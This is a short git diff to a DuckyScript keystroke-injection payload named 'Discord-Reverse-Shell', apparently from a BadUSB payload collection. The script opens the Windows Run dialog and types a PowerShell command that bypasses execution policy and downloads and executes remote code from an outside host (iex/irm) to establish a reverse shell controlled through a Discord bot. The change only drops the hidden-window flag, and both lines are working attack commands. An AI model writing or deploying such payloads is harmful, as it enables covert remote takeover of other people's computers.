diff --git a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt index 4929478..bb2ab10 100644 --- a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt +++ b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt @@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs) +STRING powershell -Ep Bypass -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs) ENTER